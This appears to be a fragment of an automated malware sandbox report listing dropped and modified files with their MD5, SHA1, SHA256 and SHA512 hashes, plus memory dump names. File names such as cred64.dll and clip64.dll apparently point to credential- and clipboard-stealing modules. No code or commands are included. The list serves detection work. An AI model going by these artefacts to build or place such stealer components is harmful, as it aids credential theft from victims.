SHA512 f3a1f901ecb25f7482561a8d79c5440faa4d8390f15f565f5ad5138bfdf89a68a179e91ea1c85cafe8a8b43510fcdcfee3e53aa83a04a3df5194eb68679df8ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 eb6caf099a9064b081a7a5e15baa184e
SHA1 c1ae7e703f5c61a5b7aa62de29fc6365fadf3539
SHA256 803dfc6972722d787fa8be7c93bd62f93326594d3f22d9261d8ca9c240a7f07d
SHA512 0b5d641cca28be17b9a4ef11f76f91d3961933c16b8268abc0817da673d672d4b46d9a3333eede8962e2e05c0a866b7b01fb638c53287824c36102842d83ccad

C:\Users\Admin\AppData\Local\Temp\114462139309

MD5 ebb0bb6a8d4aa821dc75a210542b40c1
SHA1 552b6af0637268c3a855199cfb631dbe50a76d4f
SHA256 c76879f7c8ac52b73f20953e334d9618738b84a0bc736425841de7f80692ab9e
SHA512 02ef9d0694dcb66482b207c682d4b7a88cf1c76b5ad1adbf2ccd3e1933575c39bfe3743b4bc95c145bf5011e816474a67c10192d54344cd5b5b9552d324cef15

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7a45c8b3472b2e19d28ecbb11ca7d7a4
SHA1 610d45beddf085676462380c55f66f96e51bff0d
SHA256 da922bd396ace9af09787d26d2a9c620a53a79d9cd9b5e95920e0c52d2332225
SHA512 5c418d68ea49351ba73474e319b43a3884a9ca081ca24c56ef170cd00f921f00779b504c112fe2a8d3bcf23397e5b8f1aea99c5c20a1702ed6a98960f00583b2

memory/8816-1404-0x0000000000400000-0x000000000041B000-memory.dmp

memory/8816-1419-0x0000000000400000-0x000000000041B000-memory.dmp

memory/8816-1421-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 0200dcae586c96fca0f85616302942a2
SHA1 89c1078101641ffc53cd44bd8ab0cee4c2d1f7b3
SHA256 7f88ed8657246f69bf1fba33ab5ffaba9efb8645e46ce9dad55fe1fbf7b3064f
SHA512 08e7c57919419119fa135582630385ad82550419a5970c07f00e500b7db0c4b9ff1360dae684d66cb45080e61e7d4de0e84c837036c8b31221f6263995d7b313

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003f

MD5 990324ce59f0281c7b36fb9889e8887f
SHA1 35abc926cbea649385d104b1fd2963055454bf27
SHA256 67bcedd3040fc55d968bbe21df05c02b731181541aff4ae72b9205300a4a3ecc
SHA512 31e83da1ac217d25be6e7f35a041881b926f731fff69db6f144e4fe99b696a31f9ab7766ca22cf5a482743c2a2d00a699ca2c2d67837a86c471a2dd3bed9ea1f

C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll

MD5 1c27631e70908879e1a5a8f3686e0d46
SHA1 31da82b122b08bb2b1e6d0c904993d6d599dc93a
SHA256 478aa272d465eaa49c2f12fc141af2c0581f569ccf67f628747d90cc03a1e6a9
SHA512 7230ccad5e910f4f1aafb26642670c227a5d6e30f9c3de9a111e9c471651e54e352c56f34093667e6a51e78d01f3271c5e9d3248de5e1e82ae0e5d2aaea977dd

C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll

MD5 ceffd8c6661b875b67ca5e4540950d8b
SHA1 91b53b79c98f22d0b8e204e11671d78efca48682
SHA256 da0bf5520986c2fb92fa9658ee2fcbb07ee531e09f901f299722c0d14e994ed2
SHA512 6f78e3479c7b80cee0c2cea33a5b3e06c65b3e85a558f2df4b72211f714b81a2549daed0bc7ffe1456867b447ede9caeec73a6c4d2b345aad664d501212d07d4

C:\Users\Admin\AppData\Local\Temp\tmpCC50.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpCE2B.tmp

MD5 bc741c35d494c3fef538368b3cd7e208
SHA1 71deaa958eaf18155e7cdc5494e11c27e48de248
SHA256 97658ad66f5cb0e36960d9b2860616359e050aad8251262b49572969c4d71096
SHA512 be8931de8578802ff899ef8f77339fe4d61df320e91dd473db1dc69293ed43cd69198bbbeb3e5b39011922b26b4e5a683e082af68e9d014d4e20d43f1d5bcc30

C:\Users\Admin\AppData\Local\Temp\tmpD15B.tmp

MD5 fb16d31cb0823e4593addc2c044bfee5
SHA1 66bd13b19f35cf27b8b98636bfddde228f8159c9
SHA256 ca248ebb866436e8ab9d41da5682bb9c615191906e1b49ecabfaf85158938648
SHA512 3d226b9ce32bbc6170741e8a365063a1238defcb478d52144f7e185a9b8c84509c53eaf17c970855f1d373efb8e538458e7f1dd192f70bf09cadde51411f5ac3

C:\Users\Admin\AppData\Local\Temp\tmpD115.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmpD1A6.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Local\Temp\tmpD12B.tmp

MD5 a3324fe998214ca3b7a35ef4161b25c4
SHA1 2c8dda4966fd021085d0ba6615170327ac4293ca
SHA256 321155e57513fa708f3eaad76b7fd48375653f3a39389916557ffe05282361fc
SHA512 d6d08abc0d85c6c9efae4a5b7509102e6f80f803f056e3b5dcf0c91cdf54e2fefc0fc4f655ee23a2bdf3c61e82100980b6dad95b9b9d5a14c616f93067f00a09

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4wrzubyo.5vz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 4daace57ef1aec1213ee26532615eff8
SHA1 2d9aa69a7b291acdd64490e3ba2d4364a3e19568
SHA256 1b67b43204c3399c7abcceb856fd8866f8697be69324a94ac5629acc166f87b1
SHA512 ee50b690edad11c7881a6d58c3e9ef9b515f88520e81a2ec16b0a2866d3974d9a5b45d1657d46b3d5cbc7a90e93098037474548190d9c81378bccd96a8bc0220

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 34682a55dae021e10ed3152e3d224443
SHA1 e88249d15ca58a65d536cd434e0a9e14dfbb9a3f
SHA256 8550bf8d682c86ab492aa7c16565dea99df806ab154d2520fe683b3133f2fdca
SHA512 e3ff91efd647dfaed9cafcdb15c4845890625fc2b86502edf2c32fb4f0340879660b6e330f4f9ac66d92ce967332dca5cd7d9f72b63a005773bba649d38a4366

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 81ea6f3c592caaa84407818b09a611ac
SHA1 2bf589631f259d4f0f7fbf62bb22bd199f81997c
SHA256 f27e883ce823d8690256f1674d1ad183ba28bea1a85864174ea096d521f69df4
SHA512 87cef6622498c579c7b59b60e47a978f3442b4ace85247ae75c1f7cdc072a64fd9f06fba60a4467a6f4b29894c18bbf6e57f54b8bd978d652110dd0b313ccf61

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a47861f74c0ea677533d4c8e32efbb5a
SHA1 f3d165eb3da7e1bb03b094f9101c39df40c23c1f
SHA256 d834a24952e6ffef63735931d2e5636aa60aa9b122d2e943a4dddd254609053a
SHA512 e14f3a2119a611114e6ac1e7de3f63f4151cb7a892bfdb27da419197c2a12a05268d77e07f5623a667b719eac8b5b0e8186977338487ce74d915926632dd2626

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 becc82fc01b4973c5ddb88d6ab7a351a
SHA1 f5f38e62c0d977a052f3bd5b0abe03bfdc973207
SHA256 5d5c8e8908976b87982f4ea0f6801fc5d8117ef040010f6a83872501f8d14aa9
SHA512 0a5d7ef632f34ae8daa21bf98fef59038970fa7aa1e7e6ea6339dfc8a868d85a5c01c489935c1cd91302270f8463c276eb3659ce42f23dcb809021b5e2c69dcc

memory/5196-1896-0x00007FF70DDC0000-0x00007FF70E361000-memory.dmp